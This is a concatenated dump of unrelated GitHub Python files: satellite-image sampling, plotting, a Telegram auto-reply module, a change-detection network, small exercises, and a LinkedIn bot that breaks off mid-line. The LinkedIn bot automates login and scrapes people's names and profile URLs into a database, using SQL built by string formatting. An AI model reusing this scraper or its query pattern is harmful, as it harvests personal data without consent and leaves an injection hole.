\"Urban\"]\n\n print(\"checking samples...\")\n valid = [self[i] is not None for i in tqdm(range(len(self)))]\n self.index = self.index.loc[np.array(valid)]\n print(f\"dropping {(~np.array(valid)).sum()} invalid samples\")\n\n\n def __len__(self):\n return len(self.index)\n\n def __getitem__(self, item):\n geometry = self.index.iloc[item].geometry\n x,y = geometry.centroid.x, geometry.centroid.y\n\n left, bottom, right, top = x, y, x + self.imagesize, y + self.imagesize\n bounds = left, bottom, right, top\n\n s2, meta = load_s2_image(self.imagepath, bounds, expected_image_size=self.imagesize)\n\n # stop early if loading failed (is checked for \"checking samples above\")\n if s2 is None:\n return None\n\n if self.segmentation:\n targets = rio.features.rasterize(self.shapes.geometry, all_touched=True,\n transform=meta[\"transform\"], out_shape=s2[0].shape)\n return s2, targets, meta\n else:\n return s2, meta\n \n \n def get_image(self, cx, cy, imagesize):\n\n left, bottom, right, top = cx - imagesize // 2, cy - imagesize // 2, cx + imagesize // 2, cy + imagesize // 2\n bounds = left, bottom, right, top\n\n s2, meta = load_s2_image(self.imagepath, bounds, expected_image_size=imagesize)\n\n targets = rio.features.rasterize(self.shapes.geometry, all_touched=True,\n transform=meta[\"transform\"], out_shape=s2[0].shape)\n\n return s2, targets, meta\n \ndef get_center(m):\n pixel_size = m[\"transform\"].a\n x = m[\"transform\"].c\n y = m[\"transform\"].f\n\n cx = x + m[\"width\"] // 2 * pixel_size\n cy = y - m[\"height\"] // 2 * pixel_size\n return cx, cy\n\n\ndef make_grid(polygon, edge_size):\n \"\"\"\n polygon : shapely.geometry\n edge_size : length of the grid cell\n from https://stackoverflow.com/questions/68770508/st-make-grid-method-equivalent-in-python/68778560#68778560\n \"\"\"\n bounds = polygon.bounds\n x_coords = np.arange(bounds[0] + edge_size / 2, bounds[2], edge_size)\n y_coords = np.arange(bounds[1] + edge_size / 2, bounds[3], edge_size)\n combinations = np.array(list(product(x_coords, y_coords)))\n squares = gpd.points_from_xy(combinations[:, 0], combinations[:, 
1]).buffer(edge_size / 2, cap_style=3)\n return gpd.GeoSeries(squares[squares.intersects(polygon)])\n\ndef write_urban_tif_and_shape(data_path, tile, urban_class=7,\n erosion_size=3, overwrite=False,\n simplify_radius=10, edge_size = 640):\n \"\"\"\n creates a raster file of urban areas only. these areas are eroded by a certain amount\n creates a shapefile of settlements by vectorizing the eroded raster file\n \"\"\"\n\n labels_tif = os.path.join(data_path, \"Test\", tile, \"labels\", \"raster\", f\"{tile}.tif\")\n target_tif = os.path.join(data_path, \"Test\", tile, \"labels\", \"urban\", f\"{tile}.tif\")\n target_shp = os.path.join(data_path, \"Test\", tile, \"labels\", \"urban\", f\"{tile}.shp\")\n\n os.makedirs(os.path.dirname(target_tif), exist_ok=True)\n\n if os.path.exists(target_tif) and os.path.exists(target_shp) and not overwrite:\n print(f\"files {target_tif} and {target_shp} exist. skipping, specify overwrite=True to rewrite\")\n return\n\n with rio.open(labels_tif, \"r\") as src:\n lab = (src.read(1) == urban_class)\n lab = binary_opening(lab, footprint=np.ones((erosion_size, erosion_size)))\n lab = np.nan_to_num(lab, nan=255)\n\n profile = src.profile\n profile.update(\n dtype=\"uint8\",\n nodata=\"255\"\n )\n\n with rio.open(target_tif, \"w\", **profile) as dst:\n dst.write(lab, 1)\n print(f\"wrote {target_tif}\")\n\n shapes = features.shapes((lab == 1).astype(\"uint8\"), transform=src.transform)\n\n geoms = [Polygon(record[\"coordinates\"][0]) for (record, i) in shapes]\n gdf = gpd.GeoDataFrame(geometry=geoms, crs=profile[\"crs\"])\n b = gdf.iloc[-1]\n boundary = gpd.GeoDataFrame([1], geometry=[b.geometry], crs=profile[\"crs\"])\n gdf = gdf.iloc[:-2]# drop the trailing rows, which are polygons covering the entire image\n gdf = gdf.dissolve().explode(index_parts=True)\n if simplify_radius > 0:\n gdf.geometry = gdf.geometry.simplify(simplify_radius) # simplify at 10m resolution to avoid pixel corners\n\n # split large polygons into smaller ones\n geometries = []\n for (_, idx), row in gdf.iterrows():\n if row.geometry.area > edge_size**2:\n geoms = make_grid(row.geometry, edge_size=edge_size)\n geoms = gpd.GeoSeries(geoms, crs=profile[\"crs\"])\n split_idx = list(geoms.index)\n geoms.index = [f\"{idx}-{i}\" for i in split_idx]\n geometries.append(geoms)\n else:\n _, idx = row.name\n series = gpd.GeoSeries(row, crs=profile[\"crs\"])\n series.index = [f\"{idx}-0\"]\n geometries.append(series)\n blocks = pd.concat(geometries)\n\n gdf = gpd.clip(blocks, gdf, keep_geom_type=True)\n #msk = (gdf.geometry.type == \"Polygon\") | (gdf.geometry.type == \"MultiPolygon\")\n #multipolys = gdf.loc[]\n #gdf = gdf.loc[msk] # removing GeometryCollections\n\n gdf.to_file(target_shp)\n print(f\"wrote {target_shp}\")\n\ndef mosaik(data_path, tile, overwrite=False):\n target_path = os.path.join(data_path, \"Test\", tile, \"mosaik\")\n os.makedirs(target_path, exist_ok=True)\n bands = glob(os.path.join(data_path, \"Test\", tile, \"*\", \"B*.jp2\"))\n scene = [b.split(\"/\")[-2] for b in bands]\n b = [b.split(\"/\")[-1].replace(\".jp2\", \"\") for b in bands]\n df = pd.DataFrame([bands, scene, b], index=[\"path\", \"scene\", \"band\"]).T\n for band in BANDS:\n trg_file = os.path.join(target_path, f\"{band}.jp2\")\n if os.path.exists(trg_file) and not overwrite:\n print(f\"{trg_file} exists. skipping. 
specify overwrite=True to regenerate mosaik\")\n continue\n\n df_ = df.loc[df.band == band]\n\n arrs = []\n for idx, row in df_.iterrows():\n with rio.open(row.path, \"r\") as src:\n arrs.append(src.read(1))\n profile = src.profile\n\n arrs = np.stack(arrs).astype(\"float16\")\n arrs[arrs == 0] = np.nan\n mosaik = np.nan_to_num(np.nanmin(arrs,axis=0)).astype(\"uint16\")\n\n with rio.open(trg_file, \"w\", **profile) as dst:\n dst.write(mosaik, 1)\n print(f\"writing {trg_file}\")\n\ndef sample_settlements(data_source,\n target_index,\n num_samples=50,\n dist_rv=skewcauchy(a=0.999, loc=5000, scale=10000),\n return_idx_p=False,\n seed=0):\n # makes sure p sums to one\n def normalize(x):\n return (x / x.sum())\n\n target_sample = data_source.index.iloc[target_index]\n geom = target_sample.geometry\n x, y = geom.centroid.x, geom.centroid.y\n\n distances = []\n for idx, row in data_source.index.iterrows():\n c = row.geometry.centroid\n cx, cy = c.x, c.y\n distances.append(np.sqrt((x - cx) ** 2 + (y - cy) ** 2))\n distances = np.array(distances)\n\n p = normalize(dist_rv.pdf(distances))\n\n idxs = np.random.RandomState(seed).choice(np.arange(len(data_source)), replace=False, p=p, size=num_samples)\n\n # keep the samples as a list of tuples so they can be unpacked below\n batch = [data_source[idx] for idx in idxs]\n\n if data_source.segmentation:\n X, y, meta = map(list, zip(*batch))\n batch = (np.stack(X), np.stack(y), meta)\n else:\n X, meta = map(list, zip(*batch))\n batch = (np.stack(X), meta)\n\n if return_idx_p:\n return batch, idxs, p\n else:\n return batch\n \ndef sample_negatives(data_source,\n target_index,\n num_samples=50,\n dist_rv=skewcauchy(a=0.999, loc=5000, scale=10000),\n seed=0):\n # makes sure p sums to one\n segmentation = data_source.segmentation\n\n imagesize = data_source.imagesize\n imagepath = data_source.imagepath\n\n target_sample = data_source.index.iloc[target_index]\n geom = target_sample.geometry\n cx, cy = geom.centroid.x, geom.centroid.y\n\n # sample polar coordinates\n n_coordinates = num_samples*4 # sample more coordinates in case some are invalid\n distances = dist_rv.rvs(n_coordinates, random_state=seed)\n angles = np.random.RandomState(seed).randn(n_coordinates) * 2 * np.pi\n\n X = cx + distances * np.cos(angles)\n Y = cy + distances * np.sin(angles)\n\n batch = []\n targets = []\n metas = []\n for x,y in zip(X,Y):\n left, bottom, right, top = x, y, x + imagesize, y + imagesize\n bounds = left, bottom, right, top\n\n s2, meta = load_s2_image(imagepath, bounds, expected_image_size=imagesize)\n if s2 is not None: # if valid\n\n if segmentation:\n t = rio.features.rasterize(data_source.shapes.geometry, all_touched=True,\n transform=meta[\"transform\"], out_shape=s2[0].shape)\n targets.append(t)\n\n batch.append(s2)\n metas.append(meta)\n\n # stop early if sufficient valid samples have been found\n if len(batch) >= num_samples:\n break\n\n if segmentation:\n return np.stack(batch), np.stack(targets), metas\n else:\n return np.stack(batch), metas\n\ndef sample_batch(data_source, target_index, num_shots=(10, 10), dist_rv=skewcauchy(a=0.999, loc=5000, scale=10000)):\n num_shots_pos, num_shots_neg = num_shots\n \n pos_batch = sample_settlements(data_source, target_index=target_index, num_samples=num_shots_pos, dist_rv=dist_rv)\n neg_batch = sample_negatives(data_source, target_index=target_index, num_samples=num_shots_neg, dist_rv=dist_rv)\n\n if not data_source.segmentation:\n pos_X, pos_metas = pos_batch\n neg_X, neg_metas = neg_batch\n pos_target = np.ones(pos_X.shape[0], dtype=int)\n neg_target = np.zeros(neg_X.shape[0], dtype=int)\n\n return np.vstack([pos_X, neg_X]), np.hstack([pos_target, neg_target])\n\n 
else:\n pos_X, pos_target, pos_meta = pos_batch\n neg_X, neg_target, neg_meta = neg_batch\n\n return np.vstack([pos_X, neg_X]), np.vstack([pos_target, neg_target]), pos_meta + neg_meta\n\n\ndef load_uc2_settlement_data(\n num_shots=(200, 600),\n imagesize=10240,\n target_index=600,\n datapath=\"/data/RepreSent/UC2\",\n savepath=None,\n use_cache=False): # f\"/home/marc/Desktop/uc2_settlements/{target_index}\"\n \n if use_cache and savepath is not None:\n data = torch.load(os.path.join(savepath, 'data.npz'))\n return data[\"X\"], data[\"Y\"], data[\"x_test\"], data[\"y_test\"], data[\"buildings\"], data[\"meta\"]\n\n ds = SettlementDataset(datapath, \"37LBL\", segmentation=True)\n\n x, y, meta_ = ds[target_index]\n cx, cy = get_center(meta_)\n\n x_test, y_test, meta = ds.get_image(cx, cy, imagesize=imagesize)\n\n labelprofile = copy(meta)\n labelprofile.update(\n count=1)\n\n dist = skewcauchy(a=0.999, loc=7500, scale=10000)\n print(\"sampling batch\")\n X, Y, train_metas = sample_batch(ds, target_index=target_index, num_shots=num_shots, dist_rv=dist)\n\n X = torch.from_numpy(X) * 1e-4\n Y = torch.from_numpy(Y)\n\n if savepath is not None:\n os.makedirs(savepath, exist_ok=True)\n\n #gdf.to_file(os.path.join(savepath, \"traintiles.shp\"))\n\n with rio.open(os.path.join(savepath, \"sentinel2.tif\"), \"w\", **meta) as dst:\n dst.write(x_test.astype(\"uint16\"))\n\n with rio.open(os.path.join(savepath, \"existing_labels.tif\"), \"w\", **labelprofile) as dst:\n dst.write(y_test.astype(\"uint16\"), 1)\n\n gdf = gpd.read_file(os.path.join(savepath, \"settlements.shp\"))\n with rio.open(os.path.join(savepath, \"sentinel2.tif\"), \"r\") as src:\n buildings = rio.features.rasterize(gdf.to_crs(src.crs).geometry, out_shape=(src.width, src.height),\n transform=src.transform, all_touched=True)\n\n torch.save(dict(\n X=X,\n Y=Y,\n x_test=x_test,\n y_test=y_test,\n buildings=buildings,\n meta=meta),\n os.path.join(savepath, 'data.npz'))\n\n return X, Y, x_test, y_test, buildings, meta\n\ndef main():\n import matplotlib.pyplot as plt\n from skimage.exposure import equalize_hist\n\n # SEGMENTATION\n ds = SettlementDataset(\"/data/RepreSent/UC2\", \"37LBL\", segmentation=True)\n X, Y, _ = sample_batch(ds, target_index=200)\n\n fig, axs = plt.subplots(X.shape[0], 2, figsize=(3*2, 3*X.shape[0]))\n for x,y, axs_row in zip(X,Y, axs):\n ax = axs_row[0]\n ax.imshow(equalize_hist(x[np.array([3, 2, 1])]).transpose(1, 2, 0))\n ax.set_xticks([])\n ax.set_yticks([])\n\n ax = axs_row[1]\n ax.imshow(y)\n ax.set_xticks([])\n ax.set_yticks([])\n\n plt.tight_layout()\n plt.show()\n\n # CLASSIFICATION\n ds = SettlementDataset(\"/data/RepreSent/UC2\", \"37LBL\", segmentation=False)\n X,Y = sample_batch(ds, target_index=200)\n\n fig, axs = plt.subplots(X.shape[0], 1, figsize=(3, 3*X.shape[0]))\n for x,y, ax in zip(X,Y, axs):\n ax.imshow(equalize_hist(x[np.array([3, 2, 1])]).transpose(1, 2, 0))\n ax.set_title(\"settlement\" if y == 1 else \"non-settlement\")\n ax.set_xticks([])\n ax.set_yticks([])\n\nif __name__ == '__main__':\n main()\n","repo_name":"ridvansalihkuzu/representlib","sub_path":"represent/datamodules/uc2_settlement_module.py","file_name":"uc2_settlement_module.py","file_ext":"py","file_size_in_byte":17004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"18401814855","text":"from cConstants import cEPAConstants\nfrom cEnum import eEPA\nimport cPlot3D\n\n\nclass cPlotFrame(cPlot3D.cPlotFrame):\n def __init__(self, iParent, 
**kwargs):\n cPlot3D.cPlotFrame.__init__(self, iParent, **kwargs)\n\n def initPanel(self, *args, **kwargs):\n self.m_PlotPanel = cPlotPanel(self, **kwargs)\n\n\nclass cPlotPanel(cPlot3D.cPlotPanel):\n\n def __init__(self, iParent, iXAxisItem=eEPA.evaluation, iYAxisItem=eEPA.potency, iZAxisItem=eEPA.activity, iPlotType=eEPA.fundamental, **kwargs):\n cPlot3D.cPlotPanel.__init__(self, iParent, **kwargs)\n\n self.m_XAxisItem = iXAxisItem\n self.m_YAxisItem = iYAxisItem\n self.m_ZAxisItem = iZAxisItem\n\n self.m_PlotType = iPlotType\n\n\n def getSentimentEPAIndex(self, iEPA, iSentiment):\n return iEPA + (cEPAConstants.m_Dimensions * iSentiment)\n\n\n # Axis items are the enumerations of the elements in eEPA, so they're basically numbers\n def setAxis(self, iXAxisItem, iYAxisItem, iZAxisItem):\n self.m_XAxisItem = iXAxisItem\n self.m_YAxisItem = iYAxisItem\n self.m_ZAxisItem = iZAxisItem\n\n\n def plotEPA(self, iLearnerSamples, iSimulatorSamples):\n self.clearAxes()\n\n if (0 < len(iLearnerSamples)):\n # Learner's sentiments on self and other, green and pink respectively\n self.plotScatter(\n iLearnerSamples[self.getSentimentEPAIndex(self.m_XAxisItem, cEPAConstants.m_SelfMultiplier)],\n iLearnerSamples[self.getSentimentEPAIndex(self.m_YAxisItem, cEPAConstants.m_SelfMultiplier)],\n iLearnerSamples[self.getSentimentEPAIndex(self.m_ZAxisItem, cEPAConstants.m_SelfMultiplier)],\n iAutoScaling=False, iRedraw=False, iUpdate=False, marker=\"o\", s=50, c=\"green\", alpha=1, animated=False)\n\n self.plotScatter(\n iLearnerSamples[self.getSentimentEPAIndex(self.m_XAxisItem, cEPAConstants.m_OtherMultiplier)],\n iLearnerSamples[self.getSentimentEPAIndex(self.m_YAxisItem, cEPAConstants.m_OtherMultiplier)],\n iLearnerSamples[self.getSentimentEPAIndex(self.m_ZAxisItem, cEPAConstants.m_OtherMultiplier)],\n iAutoScaling=False, iRedraw=False, iUpdate=False, marker=\"o\", s=50, c=\"pink\", alpha=1, animated=False)\n\n if (0 < len(iSimulatorSamples)):\n # Simulator's sentiments on self and other, goldenrod and blue respectively\n self.plotScatter(\n iSimulatorSamples[self.getSentimentEPAIndex(self.m_XAxisItem, cEPAConstants.m_SelfMultiplier)],\n iSimulatorSamples[self.getSentimentEPAIndex(self.m_YAxisItem, cEPAConstants.m_SelfMultiplier)],\n iSimulatorSamples[self.getSentimentEPAIndex(self.m_ZAxisItem, cEPAConstants.m_SelfMultiplier)],\n iAutoScaling=False, iRedraw=False, iUpdate=False, marker=\"o\", s=50, c=\"goldenrod\", alpha=1, animated=False)\n\n self.plotScatter(\n iSimulatorSamples[self.getSentimentEPAIndex(self.m_XAxisItem, cEPAConstants.m_OtherMultiplier)],\n iSimulatorSamples[self.getSentimentEPAIndex(self.m_YAxisItem, cEPAConstants.m_OtherMultiplier)],\n iSimulatorSamples[self.getSentimentEPAIndex(self.m_ZAxisItem, cEPAConstants.m_OtherMultiplier)],\n iAutoScaling=False, iRedraw=False, iUpdate=False, marker=\"o\", s=50, c=\"blue\", alpha=1, animated=False)\n\n\n self.m_Axes.set_xlabel(cEPAConstants.m_EPALabels[self.m_XAxisItem])\n self.m_Axes.set_ylabel(cEPAConstants.m_EPALabels[self.m_YAxisItem])\n self.m_Axes.set_zlabel(cEPAConstants.m_EPALabels[self.m_ZAxisItem])\n self.redrawAxes()\n","repo_name":"tracydou/EmotionalHandwashingAssistant","sub_path":"lib/bayesact/gui/cPlotEPA3D.py","file_name":"cPlotEPA3D.py","file_ext":"py","file_size_in_byte":3644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"12996778931","text":"l1=[]\nn1=int(input(\"\"))\nfor i in range(0,n1):\n a=int(input(\" \"))\n l1.append(a)\nopt=int(input(\"1.delete \\n 
2.Insert\"))\nif opt==2:\n a=int(input(\" index value\"))\n b=input(\"value \")\n l1.insert(a,b)\nelse:\n op=int(input(\" 1.delete by value \\n 2. delete by index \\n 3.delete range\"))\n if(op==1):\n k=input(\"enter you want to delete\")\n l1.remove(k)\n elif op==2:\n k=int(input(\"enter index\"))\n del l1[k]\n else:\n st=int(input(\"strating index\"))\n ed=int(input(\"ending value\"))\n for i in range(st,ed+1):\n del l1[i]\n\n\nprint(l1)","repo_name":"Anubhavpandey27/Python_for_ds_assignment","sub_path":"assignment 1/answer 4.py","file_name":"answer 4.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"13753823034","text":"# █ █ █ █▄▀ ▄▀█ █▀▄▀█ █▀█ █▀█ █ █\n# █▀█ █ █ █ █▀█ █ ▀ █ █▄█ █▀▄ █▄█\n\n# 🔒 Licensed under the GNU GPLv3\n# 🌐 https://www.gnu.org/licenses/agpl-3.0.html\n# 👤 https://t.me/hikamoru\n\n# meta developer: @hikamorumods\n# meta banner: https://raw.githubusercontent.com/AmoreForever/assets/master/DTWR.jpg\n\nfrom .. import loader, utils\nfrom telethon.tl.types import Message\n\n\n@loader.tds\nclass DTWRMod(loader.Module):\n \"\"\"Module Don't tag wihout reason\"\"\"\n\n strings = {\n \"name\": \"DTWR\",\n \"text\": \"Your custom text\",\n \"username\": \"Input you username without '@'\",\n }\n\n strings_ru = {\n \"text\": \"Кастомный текст\",\n \"username\": \"Введи свой юзернэйм без '@'\",\n }\n\n strings_uz = {\n \"text\": \"Kastom text\",\n \"username\": \"Usernameingizni kiriting, '@' siz\"\n }\n\n def __init__(self):\n self.config = loader.ModuleConfig(\n loader.ConfigValue(\n \"Username\",\n \"username\",\n doc=lambda: self.strings(\"username\"),\n ),\n loader.ConfigValue(\n \"custom_text\",\n \"😫 Please don't tag me without reason\",\n doc=lambda: self.strings(\"text\"),\n ),\n )\n\n @loader.command(ru_docs=\"Конфиг этого модуля\")\n async def cfgdtwrcmd(self, message):\n \"\"\"This module config\"\"\"\n name = self.strings(\"name\")\n await self.allmodules.commands[\"config\"](\n await utils.answer(message, f\"{self.get_prefix()}config {name}\")\n )\n\n @loader.tag(\"only_messages\", \"only_groups\", \"in\")\n async def watcher(self, message: Message):\n\n reply = await message.get_reply_message()\n\n tag = self.config['Username']\n if tag.startswith('@') is False:\n tag = f\"@{tag}\"\n\n if reply:\n return False\n if message.text.lower() == tag:\n await message.reply(self.config[\"custom_text\"])\n await self._client.send_read_acknowledge(\n message.chat_id,\n clear_mentions=True,\n )\n","repo_name":"AmoreForever/amoremods","sub_path":"dtwr.py","file_name":"dtwr.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"38"} +{"seq_id":"22652870187","text":"import paddle\nimport paddle.nn as nn\n\nfrom .layers import Conv7x7\n# from utils.download import download_and_decompress\n# from ops.tlx_basic_pooling import tlx_MaxPool2d, tlx_MaxUnPool2d\n# from utils.load_model import restore_model, load, download_and_decompress\nfrom paddle2tlx.pd2tlx.utils import load_model_cdet\nCDNET_URLS = \"https://paddlers.bj.bcebos.com/pretrained/cd/levircd/weights/cdnet_levircd.pdparams\"\n\nclass CDNet(nn.Layer):\n \"\"\"\n The CDNet implementation based on PaddlePaddle.\n\n The original article refers to\n Pablo F. 
Alcantarilla, et al., \"Street-View Change Detection with\n Deconvolutional Networks\"\n (https://link.springer.com/article/10.1007/s10514-018-9734-5).\n\n Args:\n in_channels (int): Number of bands of the input images.\n num_classes (int): Number of target classes.\n \"\"\"\n\n def __init__(self, in_channels, num_classes):\n super(CDNet, self).__init__()\n self.conv1 = Conv7x7(in_channels, 64, norm=True, act=True)\n self.pool1 = nn.MaxPool2D(2, 2, return_mask=True)\n self.conv2 = Conv7x7(64, 64, norm=True, act=True)\n self.pool2 = nn.MaxPool2D(2, 2, return_mask=True)\n self.conv3 = Conv7x7(64, 64, norm=True, act=True)\n self.pool3 = nn.MaxPool2D(2, 2, return_mask=True)\n self.conv4 = Conv7x7(64, 64, norm=True, act=True)\n self.pool4 = nn.MaxPool2D(2, 2, return_mask=True)\n self.conv5 = Conv7x7(64, 64, norm=True, act=True)\n self.upool4 = nn.MaxUnPool2D(2, 2)\n self.conv6 = Conv7x7(64, 64, norm=True, act=True)\n self.upool3 = nn.MaxUnPool2D(2, 2)\n self.conv7 = Conv7x7(64, 64, norm=True, act=True)\n self.upool2 = nn.MaxUnPool2D(2, 2)\n self.conv8 = Conv7x7(64, 64, norm=True, act=True)\n self.upool1 = nn.MaxUnPool2D(2, 2)\n self.conv_out = Conv7x7(64, num_classes, norm=False, act=False)\n\n def forward(self, t1, t2):\n x = paddle.concat([t1, t2], axis=1)\n x, ind1 = self.pool1(self.conv1(x))\n x, ind2 = self.pool2(self.conv2(x))\n x, ind3 = self.pool3(self.conv3(x))\n x, ind4 = self.pool4(self.conv4(x))\n x = self.conv5(self.upool4(x, ind4))\n x = self.conv6(self.upool3(x, ind3))\n x = self.conv7(self.upool2(x, ind2))\n x = self.conv8(self.upool1(x, ind1))\n return [self.conv_out(x)]\n\n\ndef _cdnet(pretrained=None, in_channels=6, num_classes=2):\n model = CDNet(in_channels=in_channels, num_classes=num_classes)\n if pretrained:\n model = load_model_cdet(model, CDNET_URLS, \"cdnet\")\n # weight_path = download_and_decompress(CDNET_URLS)\n # param = paddle.load(weight_path)\n # # print(len([k for k in param.keys()]))\n # model.load_dict(param)\n return model\n","repo_name":"tensorlayer/Paddle2TLX","sub_path":"pd_models/paddlerscd/models/cdnet.py","file_name":"cdnet.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"38"} +{"seq_id":"45996324274","text":"\r\n\r\nprint(\"*********************************\")\r\nprint(\"*****Hello, welcome!*****\")\r\nprint(\"*********************************\")\r\nprint(\"We will help you work out your financial plan!\")\r\nprint('First we need some information:')\r\ndef calcular():\r\n while True:\r\n capital = float(input(\"What is your initial amount?\"))\r\n taxa = float(input(\"What is the interest rate of your investment (in %)?\"))\r\n tempo = float(input(\"For how many months will your capital earn this interest?\"))\r\n juros = taxa / 100\r\n\r\n print('Which calculation would you like to perform?')\r\n calculo = int(input('[1] Simple interest [2] Compound interest'))\r\n if (calculo == 1):\r\n simples = capital * (1 + juros * tempo)\r\n print(f'This is your total capital: {simples}')\r\n elif (calculo == 2):\r\n composto = capital * (1 + juros) ** tempo\r\n print(f'This is your total capital: {composto}')\r\n else:\r\n print('Invalid option! Try again!')\r\n continue\r\n break\r\ndef nova_consulta():\r\n repetir = int(input('Would you like to do a new calculation? 
[1] for YES or [2] for NO?'))\r\n if repetir == 1:\r\n calcular()\r\n elif repetir == 2:\r\n print('See you next time!')\r\n exit()\r\n else:\r\n print('Invalid option, try again!')\r\n nova_consulta()\r\n\r\ncalcular()\r\nnova_consulta()\r\n\r\n","repo_name":"vansmelof/calculadoradejuros","sub_path":"calculadora.py","file_name":"calculadora.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"73817130670","text":"import logging\n\nimport gmail\n\nlogging.basicConfig(level=logging.INFO)\nlogging.getLogger(\"googleapiclient\").setLevel(logging.ERROR)\nlogger = logging.getLogger('AutoReply')\n\n\ndef main():\n logger.info('AutoReply script started.')\n logger.info('Reading gmail messages')\n info_form_list = gmail.Gmail().read_messages()\n output_file = open('results.txt', 'w')\n for info_form in info_form_list:\n output_file.write(str(info_form))\n output_file.write('\\n<<<-------------->>>\\n')\n output_file.close()\n logger.info('Reading Gmail messages completed. Please check results.txt')\n\nif __name__ == '__main__':\n main()\n","repo_name":"jaideep-khadilkar/InfoProvider","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"70570334191","text":"import os\nimport sys\nimport time \nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urlparse\nimport lxml\nimport re\nimport sqlite3\nfrom sqlite3 import Error as DB_ERROR\nimport random\n\n# Import chromedriver.exe\nplatform = sys.platform\n\nif platform == \"linux\":\n chromedriver = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), \"webdriver/linux/chromedriver.exe\")\n sys.path.append(\"/home/jarret/.local/lib/python3.6/site-packages/\")\nelif platform == \"win32\":\n chromedriver = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), r\"webdriver\\windows\\chromedriver.exe\")\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException, WebDriverException\n\nclass LinkedIn_Bot:\n\n def __init__(self, username, password):\n self.username = username\n self.password = password\n self.current_page_source = None\n\n def __str__(self):\n return \"LinkedIn_Bot - Created By Jarret Laberdee - Class Object Created To Increase Reach Of Development Web On LinkedIn\"\n\n def create_browser(self):\n \"\"\"Creates a browser instance of webdriver.\"\"\"\n options = webdriver.ChromeOptions()\n options.add_argument(\"--ignore-certificate-errors\")\n options.add_argument(\"--ignore-ssl-errors\")\n self.browser = webdriver.Chrome(executable_path=chromedriver, chrome_options=options)\n\n def get_page_source(self):\n page = BeautifulSoup(self.browser.page_source, features='lxml')\n return page \n\n def close_browser(self):\n self.browser.close()\n\n def navigate_to_url(self, url, sleep_interval):\n self.browser.get(url)\n time.sleep(sleep_interval)\n\n def login(self):\n self.browser.find_element_by_id(\"login-email\").send_keys(self.username)\n self.browser.find_element_by_id(\"login-password\").send_keys(self.password)\n self.browser.find_element_by_id(\"login-submit\").click()\n time.sleep(2)\n\n def navigate_to_network(self):\n self.browser.find_element_by_id(\"mynetwork-tab-icon\").click()\n time.sleep(2)\n\n def compile_people_links(self, page):\n links = []\n for link in 
page.find_all('a'):\n url = link.get('href')\n if url:\n if '/in/' in url:\n if url not in links:\n links.append(url)\n return links\n\n def scroll_to_bottom(self, num_scrolls):\n \"\"\"Scrolls to the bottom of the page by executing Javascript\"\"\"\n\n SCROLL_PAUSE_TIME = 1.25\n scroll_height_cmd = \"window.scrollTo(0, document.body.scrollHeight);\"\n \n for page in range(num_scrolls):\n last_height = self.browser.execute_script(\"return document.body.scrollHeight\")\n self.browser.execute_script(scroll_height_cmd)\n # self.browser.execute_script(\"alert('Scrolling')\")\n time.sleep(SCROLL_PAUSE_TIME)\n new_height = self.browser.execute_script(\"return document.body.scrollHeight\")\n if new_height == last_height:\n return\n last_height = new_height\n\n def store_people(self, url_list):\n people_list = []\n root_url = \"https://www.linkedin.com\"\n for person_object in url_list:\n split_person_object = person_object.replace(\"/\", \" \").replace(\"-\", \" \")\n split_person_object = split_person_object.split()\n person_url = root_url + person_object\n\n if split_person_object:\n if len(split_person_object) == 5:\n first_name = split_person_object[1]\n last_name = split_person_object[2]\n certification = split_person_object[3]\n ID = split_person_object[4]\n elif len(split_person_object) == 4:\n first_name = split_person_object[1]\n last_name = split_person_object[2]\n certification = \"None\"\n ID = split_person_object[3]\n elif len(split_person_object) == 3:\n first_name = split_person_object[1]\n last_name = split_person_object[2]\n certification = \"None\"\n ID = str(split_person_object[1]) + str(split_person_object[2])\n elif len(split_person_object) == 2:\n first_name = split_person_object[1]\n last_name = \"None\"\n certification = \"None\"\n ID = split_person_object[1]\n else:\n # URL doesn't match any of the expected shapes, skip it\n continue\n\n person = {\n 'ID' : ID,\n 'first_name' : first_name,\n 'last_name' : last_name,\n 'certification' : certification, \n 'added' : False, \n 'URL' : person_url, \n 'position_desc' : 'None',\n 'job_potential' : False,\n 'messaged' : False\n }\n\n people_list.append(person)\n\n return people_list\n\n def open_database(self):\n ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n DB_PATH = os.path.join(ROOT_DIR, 'LinkedIn_People.db')\n\n try:\n db_connection = sqlite3.connect(DB_PATH)\n return db_connection\n except DB_ERROR as e:\n print(e)\n return None\n return None\n\n def database_write(self, people_list):\n db_connection = self.open_database()\n\n try:\n self.create_table(db_connection)\n db_connection.commit()\n self.append_people(people_list, db_connection)\n db_connection.commit()\n except DB_ERROR as e:\n print(e)\n finally:\n db_connection.close()\n\n def create_table(self, db_connection):\n\n create_table = \"\"\" CREATE TABLE IF NOT EXISTS people (\n ID text PRIMARY KEY UNIQUE,\n first_name text NOT NULL,\n last_name text NOT NULL, \n certification text, \n added boolean, \n URL text NOT NULL, \n position_desc text,\n job_potential boolean,\n messaged boolean\n ) \"\"\"\n\n try:\n db_cursor = db_connection.cursor()\n db_cursor.execute(create_table)\n except DB_ERROR as e:\n print(e)\n\n def append_people(self, people_list, db_connection):\n \n try:\n db_cursor = db_connection.cursor()\n\n for person in people_list:\n columns = ', '.join(person.keys())\n values = \"'{}', '{}', '{}', '{}', '{}', '{}', '{}', '{}', '{}'\".format(str(person[\"ID\"]), str(person[\"first_name\"]), str(person[\"last_name\"]), str(person[\"certification\"]), person[\"added\"], person[\"URL\"], person[\"position_desc\"], 
